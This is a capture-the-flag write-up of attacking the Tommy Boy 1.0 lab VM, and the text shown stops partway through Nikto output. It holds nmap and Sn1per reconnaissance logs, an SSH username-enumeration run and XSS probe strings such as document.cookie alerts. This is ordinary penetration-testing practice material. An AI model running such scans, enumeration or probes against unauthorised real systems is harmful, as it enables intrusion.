» Tommy Boy 1.0 – Capture the 5 flags

Starting my first CTF. Capture all the flags, hack all the things.

Name: Tommy Boy 1.0
Date release: 27 Jul 2016
Author: Brian Johnson
Series: Tommy Boy
Web page: https://7ms.us/tommyboy

Description:HOLY SCHNIKES! Tommy Boy needs your help!
The Callahan Auto company has finally entered the world of modern technology and stood up a Web server for their customers to use for ordering brake pads.
Unfortunately, the site just went down and the only person with admin credentials is Tom Callahan Sr. – who just passed away! And to make matters worse, the only other guy with knowledge of the server just quit!

You’ll need to help Tom Jr., Richard and Michelle get the Web page restored again. Otherwise Callahan Auto will most certainly go out of business 🙁

Objective: The primary objective is to restore a backup copy of the homepage to Callahan Auto’s server. However, to consider the box fully pwned, you’ll need to collect 5 flags strewn about the system, and use the data inside them to unlock one final message.

Index

Th3 W3bs173 15 D0wn
Let’s look under the hood
» Flag #1
» Flag #2
» :8008
» :65534
Message Digest number 5
Attack the Blog
FTP
Dropboxin’ – :8008/NickIzL33t
Lunch-time is Crunch-time
SSH
Dropboxin’ Part 2 – 73H PWN1N9
Conclusion

 

Th3 W3bs173 15 D0wn

A little troubleshooting before we begin. The TommyBoy1dot0.ova file has a hardware version of ‘vmx-12’ which is newer than what my ESX 6.0.0 host supports: vmx-11. I found this out when importing the .OVA and receiving an error

"Unsupported hardware family vmx-12" on line 25.


Looks like I’ll have to find a way to change that. Luckily .OVA is an archive so I extract everything with 7zip and take a look. The .OVF file is actually an XML file, so I find the line and change it.

<vssd:VirtualSystemType>vmx-12</vssd:VirtualSystemType>


After that I need to calculate the SHA-1 hash for the .OVF file and edit the .MF file with the new SHA-1

SHA1(TommyBoy1dot0.ovf)= d5a8ddd9eb26b0484731c17c47c471c5ff305e5b
SHA1(TommyBoy1dot0-disk1.vmdk)= 044c48cb6751288f002efdb39fae43d8ed48be42


Now I can import the .OVF without a hitch.

tommyboot

Thar she boots!
 

Let’s look under the hood

So the backdrop for this is a 90’s comedy: Tommy Boy. In which the late Chris Farley plays an incompetent, immature, and dimwitted heir to an auto parts factory who must save the business to keep it out of the hands of his new, con-artist relatives and big business. Juicy set story!

As I haven’t had a lot of experience with the Metasploit Framework I’m planning on doing most of my stuff in there and see what I can make it do for me. It allows for using external commands and it’s a dbase to keep my stuff in. From the Billy Madison VM I also managed to grab a little something called: Sn1per. It’s an automated pentest scanner that can be used to enumerate and scan for or exploit vulns. As it utilizes several tools I wanna see what this thing will churn out, if anything, on this adventure.
I start msfconsole, make a workspace for Tommy and get to work. Invincibility lies in the defence, so let’s see what’s there. Loose!

root@kali:~# msfconsole                                              
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+

Easy phishing: Set up email templates, landing pages and listeners
in Metasploit Pro -- learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.28-dev                         ]
+ -- --=[ 1584 exploits - 902 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > db_nmap -sS -sU -p 1-65535 -T4 -A -v 192.168.1.23
[*] Nmap: Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-02 20:02 CEST
[*] Nmap: NSE: Loaded 142 scripts for scanning.
[*] Nmap: NSE: Script Pre-scanning.
[*] Nmap: Initiating NSE at 20:02
[*] Nmap: Completed NSE at 20:02, 0.00s elapsed
[*] Nmap: Initiating NSE at 20:02
[*] Nmap: Completed NSE at 20:02, 0.00s elapsed
[*] Nmap: Initiating ARP Ping Scan at 20:02
[*] Nmap: Scanning 192.168.1.23 [1 port]
[*] Nmap: Completed ARP Ping Scan at 20:02, 0.02s elapsed (1 total hosts)
[*] Nmap: Initiating Parallel DNS resolution of 1 host. at 20:02
[*] Nmap: Completed Parallel DNS resolution of 1 host. at 20:02, 0.01s elapsed
[*] Nmap: Initiating SYN Stealth Scan at 20:02
[*] Nmap: Scanning CallahanAutoSrv01.fritz.box (192.168.1.23) [65535 ports]
[*] Nmap: Discovered open port 22/tcp on 192.168.1.23
[*] Nmap: Discovered open port 80/tcp on 192.168.1.23
[*] Nmap: Discovered open port 65534/tcp on 192.168.1.23
[*] Nmap: Discovered open port 8008/tcp on 192.168.1.23
[*] Nmap: Completed SYN Stealth Scan at 20:02, 0.54s elapsed (65535 total ports)
[*] Nmap: Initiating Service scan at 20:02
[*] Nmap: Scanning 4 services on CallahanAutoSrv01.fritz.box (192.168.1.23)
[*] Nmap: Completed Service scan at 20:03, 11.02s elapsed (4 services on 1 host)
[*] Nmap: Initiating OS detection (try #1) against CallahanAutoSrv01.fritz.box (192.168.1.23)
[*] Nmap: NSE: Script scanning 192.168.1.23.
[*] Nmap: Initiating NSE at 20:03
[*] Nmap: Completed NSE at 20:03, 0.25s elapsed
[*] Nmap: Initiating NSE at 20:03
[*] Nmap: Completed NSE at 20:03, 0.00s elapsed
[*] Nmap: Nmap scan report for CallahanAutoSrv01.fritz.box (192.168.1.23)
[*] Nmap: Host is up (0.00044s latency).
[*] Nmap: Not shown: 65531 closed ports
[*] Nmap: PORT      STATE SERVICE VERSION
[*] Nmap: 22/tcp    open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
[*] Nmap: | ssh-hostkey:
[*] Nmap: |   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
[*] Nmap: |_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
[*] Nmap: 80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
[*] Nmap: | http-methods:
[*] Nmap: |_  Supported Methods: OPTIONS GET HEAD POST
[*] Nmap: | http-robots.txt: 4 disallowed entries
[*] Nmap: | /6packsofb...soda /lukeiamyourfather
[*] Nmap: |_/lookalivelowbridge /flag-numero-uno.txt
[*] Nmap: |_http-server-header: Apache/2.4.18 (Ubuntu)
[*] Nmap: |_http-title: Welcome to Callahan Auto
[*] Nmap: 8008/tcp  open  http    Apache httpd 2.4.18 ((Ubuntu))
[*] Nmap: | http-methods:
[*] Nmap: |_  Supported Methods: OPTIONS GET HEAD POST
[*] Nmap: |_http-server-header: Apache/2.4.18 (Ubuntu)
[*] Nmap: |_http-title: KEEP OUT
[*] Nmap: 65534/tcp open  ftp     ProFTPD 1.2.10
[*] Nmap: MAC Address: 00:0C:29:FD:B7:B5 (VMware)


So we have a couple of tcp ports here:
– :22 ssh
– :80 http (with “/flag-numero-uno.txt”!)
– :8008 http
– :65534 ftp

For fun I’ll do a run with Sn1per – it’s probably overkill.

[*] exec: sniper 192.168.1.23
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://crowdshield.com
 + -- --=[sn1per v1.8 by 1N3

 + -- ----------------------------=[Running Nslookup]=------------------------ -- +
Server:        192.168.1.1
Address:    192.168.1.1#53

23.1.168.192.in-addr.arpa    name = CallahanAutoSrv01.fritz.box.

23.1.168.192.in-addr.arpa domain name pointer CallahanAutoSrv01.fritz.box.
 + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
[-] fingerprint:snmp: need UDP port 161 open

Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu

[+] Target is 192.168.1.23
[+] Loading modules.
[+] Following modules are loaded:
[x] [1] ping:icmp_ping  -  ICMP echo discovery module
[x] [2] ping:tcp_ping  -  TCP-based ping discovery module
[x] [3] ping:udp_ping  -  UDP-based ping discovery module
[x] [4] infogather:ttl_calc  -  TCP and UDP based TTL distance calculation
[x] [5] infogather:portscan  -  TCP and UDP PortScanner
[x] [6] fingerprint:icmp_echo  -  ICMP Echo request fingerprinting module
[x] [7] fingerprint:icmp_tstamp  -  ICMP Timestamp request fingerprinting module
[x] [8] fingerprint:icmp_amask  -  ICMP Address mask request fingerprinting module
[x] [9] fingerprint:icmp_port_unreach  -  ICMP port unreachable fingerprinting module
[x] [10] fingerprint:tcp_hshake  -  TCP Handshake fingerprinting module
[x] [11] fingerprint:tcp_rst  -  TCP RST fingerprinting module
[x] [12] fingerprint:smb  -  SMB fingerprinting module
[x] [13] fingerprint:snmp  -  SNMPv2c fingerprinting module
[+] 13 modules registered
[+] Initializing scan engine
[+] Running scan engine
[-] ping:tcp_ping module: no closed/open TCP ports known on 192.168.1.23. Module test failed
[-] ping:udp_ping module: no closed/open UDP ports known on 192.168.1.23. Module test failed
[-] No distance calculation. 192.168.1.23 appears to be dead or no ports known
[+] Host: 192.168.1.23 is up (Guess probability: 50%)
[+] Target: 192.168.1.23 is alive. Round-Trip Time: 0.48723 sec
[+] Selected safe Round-Trip Time value is: 0.97446 sec
[-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
[-] fingerprint:smb need either TCP port 139 or 445 to run
[+] Primary guess:
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Other guesses:
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Host 192.168.1.23 Running OS:  (Guess probability: 100%)
[+] Cleaning up scan engine
[+] Modules deinitialized
[+] Execution completed.

 + -- ----------------------------=[Pinging host]=---------------------------- -- +
PING 192.168.1.23 (192.168.1.23) 56(84) bytes of data.
64 bytes from 192.168.1.23: icmp_seq=1 ttl=64 time=0.403 ms

--- 192.168.1.23 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.403/0.403/0.403/0.000 ms

 + -- ----------------------------=[Running TCP port scan]=------------------- -- +

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-02 23:45 CEST
Nmap scan report for CallahanAutoSrv01.fritz.box (192.168.1.23)
Host is up (0.00021s latency).
Not shown: 36 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 00:0C:29:FD:B7:B5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.16 seconds
 + -- ----------------------------=[Running UDP port scan]=------------------- -- +

Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-02 23:45 CEST
Nmap scan report for CallahanAutoSrv01.fritz.box (192.168.1.23)
Host is up (0.00047s latency).
Not shown: 6 closed ports
PORT    STATE         SERVICE
68/udp  open|filtered dhcpc
138/udp open|filtered netbios-dgm
139/udp open|filtered netbios-ssn
161/udp open|filtered snmp
162/udp open|filtered snmptrap
520/udp open|filtered route
MAC Address: 00:0C:29:FD:B7:B5 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 1.26 seconds

 + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
 + -- --=[Port 21 closed... skipping.
 + -- --=[Port 22 opened... running tests...
# general
(gen) banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.1
(gen) software: OpenSSH 7.2p2
(gen) compatibility: OpenSSH 7.2+, Dropbear SSH 2013.62+
(gen) compression: enabled (zlib@openssh.com)

# key exchange algorithms
(kex) curve25519-sha256@libssh.org         -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp256                   -- [fail] using weak elliptic curves
                                           `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp384                   -- [fail] using weak elliptic curves
                                           `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) ecdh-sha2-nistp521                   -- [fail] using weak elliptic curves
                                           `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
                                           `- [info] available since OpenSSH 4.4
(kex) diffie-hellman-group14-sha1          -- [warn] using weak hashing algorithm
                                           `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53

# host-key algorithms
(key) ssh-rsa                              -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
(key) rsa-sha2-512                         -- [info] available since OpenSSH 7.2
(key) rsa-sha2-256                         -- [info] available since OpenSSH 7.2
(key) ecdsa-sha2-nistp256                  -- [fail] using weak elliptic curves
                                           `- [warn] using weak random number generator could reveal the key
                                           `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
(key) ssh-ed25519                          -- [info] available since OpenSSH 6.5

# encryption algorithms (ciphers)
(enc) chacha20-poly1305@openssh.com        -- [info] available since OpenSSH 6.5
                                           `- [info] default cipher since OpenSSH 6.9.
(enc) aes128-ctr                           -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes192-ctr                           -- [info] available since OpenSSH 3.7
(enc) aes256-ctr                           -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
(enc) aes128-gcm@openssh.com               -- [info] available since OpenSSH 6.2
(enc) aes256-gcm@openssh.com               -- [info] available since OpenSSH 6.2

# message authentication code algorithms
(mac) umac-64-etm@openssh.com              -- [warn] using small 64-bit tag size
                                           `- [info] available since OpenSSH 6.2
(mac) umac-128-etm@openssh.com             -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256-etm@openssh.com        -- [info] available since OpenSSH 6.2
(mac) hmac-sha2-512-etm@openssh.com        -- [info] available since OpenSSH 6.2
(mac) hmac-sha1-etm@openssh.com            -- [warn] using weak hashing algorithm
                                           `- [info] available since OpenSSH 6.2
(mac) umac-64@openssh.com                  -- [warn] using encrypt-and-MAC mode
                                           `- [warn] using small 64-bit tag size
                                           `- [info] available since OpenSSH 4.7
(mac) umac-128@openssh.com                 -- [warn] using encrypt-and-MAC mode
                                           `- [info] available since OpenSSH 6.2
(mac) hmac-sha2-256                        -- [warn] using encrypt-and-MAC mode
                                           `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha2-512                        -- [warn] using encrypt-and-MAC mode
                                           `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
(mac) hmac-sha1                            -- [warn] using encrypt-and-MAC mode
                                           `- [warn] using weak hashing algorithm
                                           `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28


Starting Nmap 7.30 ( https://nmap.org ) at 2016-10-02 23:45 CEST
Nmap scan report for CallahanAutoSrv01.fritz.box (192.168.1.23)
Host is up (0.00045s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 a0:ca:62:ce:f6:7e:ae:8b:62:de:0b:db:21:3f:b0:d6 (RSA)
|_  256 46:6d:4b:4b:02:86:89:27:28:5c:1d:87:10:55:3d:59 (ECDSA)
MAC Address: 00:0C:29:FD:B7:B5 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.45 ms CallahanAutoSrv01.fritz.box (192.168.1.23)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.82 seconds
                                                  

 ______________________________________________________________________________
|                                                                              |
|                   METASPLOIT CYBER MISSILE COMMAND V4                        |
|______________________________________________________________________________|
      \                                  /                      /
       \     .                          /                      /            x
        \                              /                      /
         \                            /          +           /
          \            +             /                      /
           *                        /                      /
                                   /      .               /
    X                             /                      /            X
                                 /                     ###
                                /                     # % #
                               /                       ###
                      .       /
     .                       /      .            *           .
                            /
                           *
                  +                       *

                                       ^
####      __     __     __          #######         __     __     __        ####
####    /    \ /    \ /    \      ###########     /    \ /    \ /    \      ####
################################################################################
################################################################################
# WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF #
################################################################################
                                                           http://metasploit.com


Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro
Learn more on http://rapid7.com/metasploit

       =[ metasploit v4.12.28-dev                         ]
+ -- --=[ 1584 exploits - 902 auxiliary - 272 post        ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

USER_FILE => /usr/share/sniper/BruteX/wordlists/simple-users.txt
RHOSTS => 192.168.1.23
RHOST => 192.168.1.23
[*] 192.168.1.23:22 - SSH - Checking for false positives
[*] 192.168.1.23:22 - SSH - Starting scan
[-] 192.168.1.23:22 - SSH - User 'admin' not found
[-] 192.168.1.23:22 - SSH - User 'administrator' not found
[-] 192.168.1.23:22 - SSH - User 'anonymous' not found
[-] 192.168.1.23:22 - SSH - User 'backup' not found
[-] 192.168.1.23:22 - SSH - User 'bee' not found
[-] 192.168.1.23:22 - SSH - User 'ftp' not found
[-] 192.168.1.23:22 - SSH - User 'guest' not found
[-] 192.168.1.23:22 - SSH - User 'GUEST' not found
[-] 192.168.1.23:22 - SSH - User 'info' not found
[-] 192.168.1.23:22 - SSH - User 'mail' not found
[-] 192.168.1.23:22 - SSH - User 'mailadmin' not found
[-] 192.168.1.23:22 - SSH - User 'msfadmin' not found
[-] 192.168.1.23:22 - SSH - User 'mysql' not found
[-] 192.168.1.23:22 - SSH - User 'nobody' not found
[-] 192.168.1.23:22 - SSH - User 'oracle' not found
[-] 192.168.1.23:22 - SSH - User 'owaspbwa' not found
[-] 192.168.1.23:22 - SSH - User 'postfix' not found
[-] 192.168.1.23:22 - SSH - User 'postgres' not found
[-] 192.168.1.23:22 - SSH - User 'private' not found
[-] 192.168.1.23:22 - SSH - User 'proftpd' not found
[-] 192.168.1.23:22 - SSH - User 'public' not found
[-] 192.168.1.23:22 - SSH - User 'root' not found
[-] 192.168.1.23:22 - SSH - User 'superadmin' not found
[-] 192.168.1.23:22 - SSH - User 'support' not found
[-] 192.168.1.23:22 - SSH - User 'sys' not found
[-] 192.168.1.23:22 - SSH - User 'system' not found
[-] 192.168.1.23:22 - SSH - User 'systemadmin' not found
[-] 192.168.1.23:22 - SSH - User 'systemadministrator' not found
[-] 192.168.1.23:22 - SSH - User 'test' not found
[-] 192.168.1.23:22 - SSH - User 'tomcat' not found
[-] 192.168.1.23:22 - SSH - User 'user' not found
[-] 192.168.1.23:22 - SSH - User 'webmaster' not found
[-] 192.168.1.23:22 - SSH - User 'www-data' not found
[-] 192.168.1.23:22 - SSH - User 'Fortimanager_Access' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[-] Auxiliary failed: Msf::OptionValidateError The following options failed to validate: KEY_FILE.
[*] 192.168.1.23:22       - SSH server version: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.1 ( service.version=7.2p2 openssh.comment=Ubuntu-4ubuntu2.1 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH os.vendor=Ubuntu os.device=General os.family=Linux os.product=Linux os.certainty=0.75 )
[*] 192.168.1.23:22       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
 + -- --=[Port 23 closed... skipping.
 + -- --=[Port 25 closed... skipping.
 + -- --=[Port 53 closed... skipping.
 + -- --=[Port 79 closed... skipping.
 + -- --=[Port 80 opened... running tests...
 + -- ----------------------------=[Checking for WAF]=------------------------ -- +

                                 ^     ^
        _   __  _   ____ _   __  _    _   ____
       ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
      | V V // o // _/ | V V // 0 // 0 // _/
      |_n_,'/_n_//_/   |_n_,' \_,' \_,'/_/
                                <
                                 ...'

    WAFW00F - Web Application Firewall Detection Tool

    By Sandro Gauci && Wendel G. Henrique

Checking http://192.168.1.23
Generic Detection results:
No WAF detected by the generic detection
Number of requests: 13

 + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
http://192.168.1.23 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[192.168.1.23], Title[Welcome to Callahan Auto]

    __  ______ _____ 
    \ \/ / ___|_   _|
     \  /\___ \ | |  
     /  \ ___) || |  
    /_/\_|____/ |_|  

+ -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
+ -- --=[Target: 192.168.1.23:80
+ -- --=[Site not vulnerable to Cross-Site Tracing!
+ -- --=[Site not vulnerable to Host Header Injection!
+ -- --=[Site vulnerable to Cross-Frame Scripting!
+ -- --=[Site vulnerable to Clickjacking!

HTTP/1.1 405 Method Not Allowed
Date: Sun, 02 Oct 2016 21:46:15 GMT
Server: Apache/2.4.18 (Ubuntu)
Allow: 
Content-Length: 301
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>405 Method Not Allowed</title>
</head><body>
<h1>Method Not Allowed</h1>
<p>The requested method TRACE is not allowed for the URL /.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.1.23 Port 80</address>
</body></html>

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2016 21:46:15 GMT
Server: Apache/2.4.18 (Ubuntu)
Last-Modified: Fri, 08 Jul 2016 13:24:23 GMT
ETag: "498-5371fb88ff1d8"
Accept-Ranges: bytes
Content-Length: 1176
Vary: Accept-Encoding
Content-Type: text/html

<html>
<title>Welcome to Callahan Auto</title>
<body>
<H1><center>Welcome to Callahan Auto!</center></H1>
<font color="FF3339"><H2>SYSTEM ERROR!</H2></font>
If your'e reading this, the Callahan Auto customer ordering system is down.  Please restore the backup copy immediately.
<p>
See Nick in IT for assistance.
</html>
<!--Comment from Nick: backup copy is in Big Tom's home folder-->
<!--Comment from Richard: can you give me access too? Big Tom's the only one w/password-->
<!--Comment from Nick: Yeah yeah, my processor can only handle one command at a time-->
<!--Comment from Richard: please, I'll ask nicely-->
<!--Comment from Nick: I will set you up with admin access *if* you tell Tom to stop storing important information in the company blog-->
<!--Comment fr

 + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
+ -- --=[Checking if X-Content options are enabled on 192.168.1.23... 

+ -- --=[Checking if X-Frame options are enabled on 192.168.1.23... 

+ -- --=[Checking if X-XSS-Protection header is enabled on 192.168.1.23... 

+ -- --=[Checking HTTP methods on 192.168.1.23... 
Allow: OPTIONS,GET,HEAD,POST

+ -- --=[Checking if TRACE method is enabled on 192.168.1.23... 

+ -- --=[Checking for open proxy on 192.168.1.23... 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /.testing/openproxy.txt was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at crowdshield.com Port 80</address>
</body></html>

+ -- --=[Enumerating software on 192.168.1.23... 
Server: Apache/2.4.18 (Ubuntu)

+ -- --=[Checking if Strict-Transport-Security is enabled on 192.168.1.23... 

+ -- --=[Checking for Flash cross-domain policy on 192.168.1.23... 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /crossdomain.xml was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.1.23 Port 80</address>
</body></html>

+ -- --=[Checking for Silverlight cross-domain policy on 192.168.1.23... 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /clientaccesspolicy.xml was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.1.23 Port 80</address>
</body></html>

+ -- --=[Checking for HTML5 cross-origin resource sharing on 192.168.1.23... 

+ -- --=[Retrieving robots.txt on 192.168.1.23... 
User-agent: *
Disallow: /6packsofb...soda
Disallow: /lukeiamyourfather
Disallow: /lookalivelowbridge
Disallow: /flag-numero-uno.txt

+ -- --=[Retrieving sitemap.xml on 192.168.1.23... 
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /sitemap.xml was not found on this server.</p>
<hr>
<address>Apache/2.4.18 (Ubuntu) Server at 192.168.1.23 Port 80</address>
</body></html>

+ -- --=[Checking cookie attributes on 192.168.1.23... 

+ -- --=[Checking for ASP.NET Detailed Errors on 192.168.1.23... 


 + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.23
+ Target Hostname:    192.168.1.23
+ Target Port:        80
+ Start Time:         2016-10-02 23:46:00 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x498 0x5371fb88ff1d8 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-3268: /webcgi/: Directory indexing found.
+ OSVDB-3268: /cgi/: Directory indexing found.
+ OSVDB-3268: /cgi-bin/: Directory indexing found.
+ OSVDB-3268: /cgi-sys/: Directory indexing found.
+ OSVDB-3268: /cgibin/: Directory indexing found.
+ OSVDB-3268: /cgi-win/: Directory indexing found.
+ OSVDB-3268: /fcgi-bin/: Directory indexing found.
+ OSVDB-3268: /cgi-exe/: Directory indexing found.
+ Entry '/6packsofb...soda' in robots.txt returned a non-forbidden or redirect HTTP code (301)
+ OSVDB-3268: /lukeiamyourfather/: Directory indexing found.
+ Entry '/lukeiamyourfather/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ OSVDB-3268: /lookalivelowbridge/: Directory indexing found.
+ Entry '/lookalivelowbridge/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/flag-numero-uno.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 4 entries which should be manually viewed.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.
+ OSVDB-3268: /iisadmin/: Directory indexing found.
+ /iisadmin/: Access to /iisadmin should be restricted to localhost or allowed hosts only.
+ OSVDB-3268: /webmail/: Directory indexing found.
+ /webmail/: Web based mail package installed.
+ OSVDB-3268: /search/?SectionIDOverride=1&SearchText=<script>alert(document.cookie);</script>: Directory indexing found.
+ OSVDB-3268: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: Directory indexing found.
+ OSVDB-2754: /guestbook/?number=5&lng=%3Cscript%3Ealert(document.domain);%3C/script%3E: MPM Guestbook 1.2 and previous are vulnreable to XSS attacks.
+ OSVDB-3268: /ariadne/: Directory indexing found.
+ /ariadne/: Ariadne pre 2.1.2 has several vulnerabilities. The default login/pass to the admin page is admin/muze.
+ OSVDB-3268: /manager/: Directory indexing found.
+ OSVDB-3268: /admin/: Directory indexing found.
+ OSVDB-3268: /web/: Directory indexing found.
+ OSVDB-3268: /publisher/: Directory indexing found.
+ OSVDB-1264: /publisher/: Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0237.
+ OSVDB-3268: /photo/: Directory indexing found.
+ OSVDB-2695: /photo/: My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.
+ OSVDB-3268: /pdf/: Directory indexing found.
+ OSVDB-3268: /acceso/: Directory indexing found.
+ OSVDB-3092: /acceso/: This might be interesting...
+ OSVDB-3268: /access/: Directory indexing found.
+ OSVDB-3092: /access/: This might be interesting...
+ OSVDB-3268: /acciones/: Directory indexing found.
+ OSVDB-3092: /acciones/: This might be interesting...
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /Administration/: Directory indexing found.
+ OSVDB-3092: /Administration/: This might be interesting...
+ OSVDB-3268: /administrator/: Directory indexing found.
+ OSVDB-3092: /administrator/: This might be interesting...
+ OSVDB-3268: /analog/: Directory indexing found.
+ OSVDB-3092: /analog/: This might be interesting...
+ OSVDB-3268: /archivar/: Directory indexing found.
+ OSVDB-3092: /archivar/: This might be interesting...
+ OSVDB-3268: /archive/: Directory indexing found.
